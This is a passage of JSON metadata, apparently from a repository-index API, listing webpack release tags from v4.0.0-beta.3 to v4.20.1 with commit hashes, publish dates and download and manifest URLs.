ag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":